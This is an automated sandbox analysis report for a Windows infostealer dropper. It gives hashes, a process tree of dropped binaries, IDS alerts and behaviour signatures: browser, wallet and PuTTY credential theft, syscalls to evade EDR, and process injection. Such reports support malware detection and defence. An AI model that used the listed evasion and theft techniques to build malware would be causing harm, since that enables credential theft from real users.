Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kXzODlqJak.exe

Overview

General Information

Sample name:kXzODlqJak.exe
renamed because original name is a hash value
Original sample name:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
Analysis ID:1586711
MD5:ab79eafcce0d6eff856b259977e480e1
SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
Tags:exeuser-crep1x
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • kXzODlqJak.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\kXzODlqJak.exe" MD5: AB79EAFCCE0D6EFF856B259977E480E1)
    • kXzODlqJak.exe (PID: 7776 cmdline: "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652 MD5: 2C6652F7E01283DE091B5200B7878E69)
      • RescueCDBurner.exe (PID: 7828 cmdline: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 7848 cmdline: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 7872 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 6224 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 2044 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 6204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 3492 cmdline: "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 1660 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 3824 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 7580 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7872, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ProcessId: 6224, ProcessName: LocalCtrl_alpha_v3.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T14:42:21.593732+010020283713Unknown Traffic192.168.2.749973104.21.80.52443TCP
2025-01-09T14:42:22.982174+010020283713Unknown Traffic192.168.2.749974104.21.80.52443TCP
2025-01-09T14:42:23.774733+010020283713Unknown Traffic192.168.2.749975104.21.80.52443TCP
2025-01-09T14:42:40.385432+010020283713Unknown Traffic192.168.2.750061104.21.80.52443TCP
2025-01-09T14:42:41.480461+010020283713Unknown Traffic192.168.2.750065104.21.80.52443TCP
2025-01-09T14:42:56.274932+010020283713Unknown Traffic192.168.2.750084104.21.80.52443TCP
2025-01-09T14:42:57.838141+010020283713Unknown Traffic192.168.2.750085104.21.80.52443TCP
2025-01-09T14:42:58.805925+010020283713Unknown Traffic192.168.2.750086104.21.80.52443TCP
2025-01-09T14:42:59.719074+010020283713Unknown Traffic192.168.2.750087104.21.80.52443TCP
2025-01-09T14:43:00.973940+010020283713Unknown Traffic192.168.2.750088104.21.80.52443TCP
2025-01-09T14:43:02.883336+010020283713Unknown Traffic192.168.2.750089104.21.80.52443TCP
2025-01-09T14:43:04.240842+010020283713Unknown Traffic192.168.2.750090104.21.80.52443TCP
2025-01-09T14:43:09.026281+010020283713Unknown Traffic192.168.2.750091104.21.80.52443TCP
2025-01-09T14:43:10.054240+010020283713Unknown Traffic192.168.2.750092104.21.80.52443TCP
2025-01-09T14:43:10.982316+010020283713Unknown Traffic192.168.2.750093104.21.80.52443TCP
2025-01-09T14:43:11.774366+010020283713Unknown Traffic192.168.2.750094104.21.80.52443TCP
2025-01-09T14:43:12.607238+010020283713Unknown Traffic192.168.2.750095104.21.80.52443TCP
2025-01-09T14:43:13.524132+010020283713Unknown Traffic192.168.2.750096104.21.80.52443TCP
2025-01-09T14:43:14.504321+010020283713Unknown Traffic192.168.2.750097104.21.80.52443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: kXzODlqJak.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092ED3B DecryptFileW,1_2_0092ED3B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_0096A2D0
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,1_2_0092DA0E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092EA4B DecryptFileW,1_2_0092EA4B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,1_2_0092DB8F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092ECE9 DecryptFileW,1_2_0092ECE9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017ED3B DecryptFileW,2_2_0017ED3B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001BA2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_001BA2D0
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_0017DA0E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017EA4B DecryptFileW,2_2_0017EA4B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_0017DB8F
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017ECE9 DecryptFileW,2_2_0017ECE9
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_13c618d5-8
Source: kXzODlqJak.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile opened: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50086 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: kXzODlqJak.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0@ source: RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1513682078.000000006C621000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1575451197.000000006D4E1000.00000020.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 00000008.00000002.1845851673.000000006D6B1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1513883518.000000006C6E1000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1575775399.000000006D5A1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0Jm source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1516266410.000000006D381000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1576546170.000000006D7F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 00000008.00000002.1846420137.00000000700A1000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00915C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00915C81
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00961290 FindFirstFileExW,1_2_00961290
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097343B FindFirstFileW,FindClose,1_2_0097343B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092E72A FindFirstFileW,FindNextFileW,FindClose,1_2_0092E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001B1290 FindFirstFileExW,2_2_001B1290
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001C343B FindFirstFileW,FindClose,2_2_001C343B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017E72A FindFirstFileW,FindNextFileW,FindClose,2_2_0017E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_00165C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00165C81
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D470D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D470D44
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D470534 _memset,FindFirstFileW,FindClose,2_2_6D470534
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D44B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D44B005
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4472FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D4472FA
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C67CC23
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C67C8FD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6481A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C6481A1
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 4x nop then or byte ptr [edi], dh3_2_6C637270
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 40.79.167.8 40.79.167.8
Source: Joe Sandbox ViewIP Address: 20.110.205.119 20.110.205.119
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49973 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49974 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50061 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50065 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50084 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50086 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50085 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50088 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50087 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50090 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50094 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50093 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50089 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50097 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50091 -> 104.21.80.52:443
